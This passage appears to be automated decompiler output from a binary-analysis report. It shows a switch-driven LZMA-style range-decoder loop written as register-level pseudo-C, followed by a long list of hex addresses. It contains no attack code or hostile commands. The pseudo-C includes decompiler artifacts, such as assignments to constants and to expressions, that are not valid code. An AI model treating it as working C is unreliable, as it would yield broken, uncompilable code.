							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406af2
                                                                                                                                                                                                  0x00406af2
                                                                                                                                                                                                  0x00406af7
                                                                                                                                                                                                  0x00406b6e
                                                                                                                                                                                                  0x00406b75
                                                                                                                                                                                                  0x00406b7f
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x0040715e
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x00407161
                                                                                                                                                                                                  0x00407167
                                                                                                                                                                                                  0x0040716d
                                                                                                                                                                                                  0x00407173
                                                                                                                                                                                                  0x0040718d
                                                                                                                                                                                                  0x00407190
                                                                                                                                                                                                  0x00407196
                                                                                                                                                                                                  0x004071a1
                                                                                                                                                                                                  0x004071a3
                                                                                                                                                                                                  0x00407175
                                                                                                                                                                                                  0x00407175
                                                                                                                                                                                                  0x00407184
                                                                                                                                                                                                  0x00407188
                                                                                                                                                                                                  0x00407188
                                                                                                                                                                                                  0x004071ad
                                                                                                                                                                                                  0x004071d4
                                                                                                                                                                                                  0x004071d4
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x004071da
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071af
                                                                                                                                                                                                  0x004071af
                                                                                                                                                                                                  0x004071b3
                                                                                                                                                                                                  0x00407362
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407362
                                                                                                                                                                                                  0x004071bf
                                                                                                                                                                                                  0x004071c6
                                                                                                                                                                                                  0x004071ce
                                                                                                                                                                                                  0x004071d1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071d1
                                                                                                                                                                                                  0x00406af9
                                                                                                                                                                                                  0x00406af9
                                                                                                                                                                                                  0x00406afd
                                                                                                                                                                                                  0x00406b05
                                                                                                                                                                                                  0x00406b08
                                                                                                                                                                                                  0x00406b0a
                                                                                                                                                                                                  0x00406b0d
                                                                                                                                                                                                  0x00406b0f
                                                                                                                                                                                                  0x00406b14
                                                                                                                                                                                                  0x00406b17
                                                                                                                                                                                                  0x00406b1e
                                                                                                                                                                                                  0x00406b25
                                                                                                                                                                                                  0x00406b28
                                                                                                                                                                                                  0x00406b33
                                                                                                                                                                                                  0x00406b3b
                                                                                                                                                                                                  0x00406b3b
                                                                                                                                                                                                  0x00406b35
                                                                                                                                                                                                  0x00406b35
                                                                                                                                                                                                  0x00406b35
                                                                                                                                                                                                  0x00406b2a
                                                                                                                                                                                                  0x00406b2a
                                                                                                                                                                                                  0x00406b2a
                                                                                                                                                                                                  0x00406b42
                                                                                                                                                                                                  0x00406b60
                                                                                                                                                                                                  0x00406b62
                                                                                                                                                                                                  0x00406d35
                                                                                                                                                                                                  0x00406d35
                                                                                                                                                                                                  0x00406d38
                                                                                                                                                                                                  0x00406d3b
                                                                                                                                                                                                  0x00406d3e
                                                                                                                                                                                                  0x00406d41
                                                                                                                                                                                                  0x00406d44
                                                                                                                                                                                                  0x00406d47
                                                                                                                                                                                                  0x00406d4a
                                                                                                                                                                                                  0x00406d4d
                                                                                                                                                                                                  0x00406d53
                                                                                                                                                                                                  0x00406d6b
                                                                                                                                                                                                  0x00406d6e
                                                                                                                                                                                                  0x00406d71
                                                                                                                                                                                                  0x00406d74
                                                                                                                                                                                                  0x00406d74
                                                                                                                                                                                                  0x00406d77
                                                                                                                                                                                                  0x00406d7d
                                                                                                                                                                                                  0x00406d55
                                                                                                                                                                                                  0x00406d55
                                                                                                                                                                                                  0x00406d5d
                                                                                                                                                                                                  0x00406d62
                                                                                                                                                                                                  0x00406d64
                                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                                  0x00406d87
                                                                                                                                                                                                  0x00406d8a
                                                                                                                                                                                                  0x00406d2d
                                                                                                                                                                                                  0x00406d33
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d8c
                                                                                                                                                                                                  0x00406d08
                                                                                                                                                                                                  0x00406d0c
                                                                                                                                                                                                  0x00407314
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407314
                                                                                                                                                                                                  0x00406d12
                                                                                                                                                                                                  0x00406d15
                                                                                                                                                                                                  0x00406d18
                                                                                                                                                                                                  0x00406d1c
                                                                                                                                                                                                  0x00406d1f
                                                                                                                                                                                                  0x00406d25
                                                                                                                                                                                                  0x00406d27
                                                                                                                                                                                                  0x00406d27
                                                                                                                                                                                                  0x00406d2a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d2a
                                                                                                                                                                                                  0x00406b44
                                                                                                                                                                                                  0x00406b44
                                                                                                                                                                                                  0x00406b47
                                                                                                                                                                                                  0x00406b4d
                                                                                                                                                                                                  0x00406b4f
                                                                                                                                                                                                  0x00406b4f
                                                                                                                                                                                                  0x00406b52
                                                                                                                                                                                                  0x00406b55
                                                                                                                                                                                                  0x00406b57
                                                                                                                                                                                                  0x00406b58
                                                                                                                                                                                                  0x00406b5b
                                                                                                                                                                                                  0x00406bc8
                                                                                                                                                                                                  0x00406bc8
                                                                                                                                                                                                  0x00406bcc
                                                                                                                                                                                                  0x00406bcf
                                                                                                                                                                                                  0x00406bd2
                                                                                                                                                                                                  0x00406bd5
                                                                                                                                                                                                  0x00406bd8
                                                                                                                                                                                                  0x00406bd9
                                                                                                                                                                                                  0x00406bdc
                                                                                                                                                                                                  0x00406bde
                                                                                                                                                                                                  0x00406be4
                                                                                                                                                                                                  0x00406be7
                                                                                                                                                                                                  0x00406bea
                                                                                                                                                                                                  0x00406bed
                                                                                                                                                                                                  0x00406bf0
                                                                                                                                                                                                  0x00406bf6
                                                                                                                                                                                                  0x00406c12
                                                                                                                                                                                                  0x00406c15
                                                                                                                                                                                                  0x00406c18
                                                                                                                                                                                                  0x00406c1b
                                                                                                                                                                                                  0x00406c22
                                                                                                                                                                                                  0x00406c28
                                                                                                                                                                                                  0x00406c2c
                                                                                                                                                                                                  0x00406bf8
                                                                                                                                                                                                  0x00406bf8
                                                                                                                                                                                                  0x00406bfc
                                                                                                                                                                                                  0x00406c04
                                                                                                                                                                                                  0x00406c09
                                                                                                                                                                                                  0x00406c0b
                                                                                                                                                                                                  0x00406c0d
                                                                                                                                                                                                  0x00406c0d
                                                                                                                                                                                                  0x00406c36
                                                                                                                                                                                                  0x00406c39
                                                                                                                                                                                                  0x00406bb0
                                                                                                                                                                                                  0x00406bb0
                                                                                                                                                                                                  0x00406bb6
                                                                                                                                                                                                  0x00406c69
                                                                                                                                                                                                  0x00406c6f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406c71
                                                                                                                                                                                                  0x00406c74
                                                                                                                                                                                                  0x00406c77
                                                                                                                                                                                                  0x00406c7a
                                                                                                                                                                                                  0x00406c7d
                                                                                                                                                                                                  0x00406c80
                                                                                                                                                                                                  0x00406c83
                                                                                                                                                                                                  0x00406c86
                                                                                                                                                                                                  0x00406c89
                                                                                                                                                                                                  0x00406c8f
                                                                                                                                                                                                  0x00406ca7
                                                                                                                                                                                                  0x00406caa
                                                                                                                                                                                                  0x00406cad
                                                                                                                                                                                                  0x00406cb0
                                                                                                                                                                                                  0x00406cb0
                                                                                                                                                                                                  0x00406cb3
                                                                                                                                                                                                  0x00406cb9
                                                                                                                                                                                                  0x00406c91
                                                                                                                                                                                                  0x00406c91
                                                                                                                                                                                                  0x00406c99
                                                                                                                                                                                                  0x00406c9e
                                                                                                                                                                                                  0x00406ca0
                                                                                                                                                                                                  0x00406ca2
                                                                                                                                                                                                  0x00406ca2
                                                                                                                                                                                                  0x00406cc3
                                                                                                                                                                                                  0x00406cc6
                                                                                                                                                                                                  0x00406c44
                                                                                                                                                                                                  0x00406c48
                                                                                                                                                                                                  0x00407308
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407308
                                                                                                                                                                                                  0x00406c4e
                                                                                                                                                                                                  0x00406c51
                                                                                                                                                                                                  0x00406c54
                                                                                                                                                                                                  0x00406c58
                                                                                                                                                                                                  0x00406c5b
                                                                                                                                                                                                  0x00406c61
                                                                                                                                                                                                  0x00406c63
                                                                                                                                                                                                  0x00406c63
                                                                                                                                                                                                  0x00406c66
                                                                                                                                                                                                  0x00406c66
                                                                                                                                                                                                  0x00406cc6
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00406ccd
                                                                                                                                                                                                  0x00406cd1
                                                                                                                                                                                                  0x00406cd1
                                                                                                                                                                                                  0x00406cd4
                                                                                                                                                                                                  0x00406cd7
                                                                                                                                                                                                  0x00406cdb
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407320
                                                                                                                                                                                                  0x00406ce1
                                                                                                                                                                                                  0x00406ce4
                                                                                                                                                                                                  0x00406ce7
                                                                                                                                                                                                  0x00406cea
                                                                                                                                                                                                  0x00406ced
                                                                                                                                                                                                  0x00406cf0
                                                                                                                                                                                                  0x00406cf3
                                                                                                                                                                                                  0x00406cf5
                                                                                                                                                                                                  0x00406cf8
                                                                                                                                                                                                  0x00406cfb
                                                                                                                                                                                                  0x00406cfe
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406d00
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00406e9d
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406ea0
                                                                                                                                                                                                  0x00406bc2
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406c3f
                                                                                                                                                                                                  0x00406b8b
                                                                                                                                                                                                  0x00406b8f
                                                                                                                                                                                                  0x004072fc
                                                                                                                                                                                                  0x00407378
                                                                                                                                                                                                  0x00407380
                                                                                                                                                                                                  0x00407387
                                                                                                                                                                                                  0x00407389
                                                                                                                                                                                                  0x00407390
                                                                                                                                                                                                  0x00407394
                                                                                                                                                                                                  0x00407394
                                                                                                                                                                                                  0x00406b95
                                                                                                                                                                                                  0x00406b98
                                                                                                                                                                                                  0x00406b9b
                                                                                                                                                                                                  0x00406b9f
                                                                                                                                                                                                  0x00406ba2
                                                                                                                                                                                                  0x00406ba8
                                                                                                                                                                                                  0x00406baa
                                                                                                                                                                                                  0x00406baa
                                                                                                                                                                                                  0x00406bad
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406bad
                                                                                                                                                                                                  0x00406c39
                                                                                                                                                                                                  0x00406b42
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x00406976
                                                                                                                                                                                                  0x0040697f
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040738d
                                                                                                                                                                                                  0x00406985
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406990
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406999
                                                                                                                                                                                                  0x0040699c
                                                                                                                                                                                                  0x0040699f
                                                                                                                                                                                                  0x004069a3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004069a9
                                                                                                                                                                                                  0x004069ac
                                                                                                                                                                                                  0x004069ae
                                                                                                                                                                                                  0x004069af
                                                                                                                                                                                                  0x004069b2
                                                                                                                                                                                                  0x004069b4
                                                                                                                                                                                                  0x004069b5
                                                                                                                                                                                                  0x004069b7
                                                                                                                                                                                                  0x004069ba
                                                                                                                                                                                                  0x004069bf
                                                                                                                                                                                                  0x004069c4
                                                                                                                                                                                                  0x004069cd
                                                                                                                                                                                                  0x004069e0
                                                                                                                                                                                                  0x004069e3
                                                                                                                                                                                                  0x004069ef
                                                                                                                                                                                                  0x00406a17
                                                                                                                                                                                                  0x00406a19
                                                                                                                                                                                                  0x00406a27
                                                                                                                                                                                                  0x00406a27
                                                                                                                                                                                                  0x00406a2b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
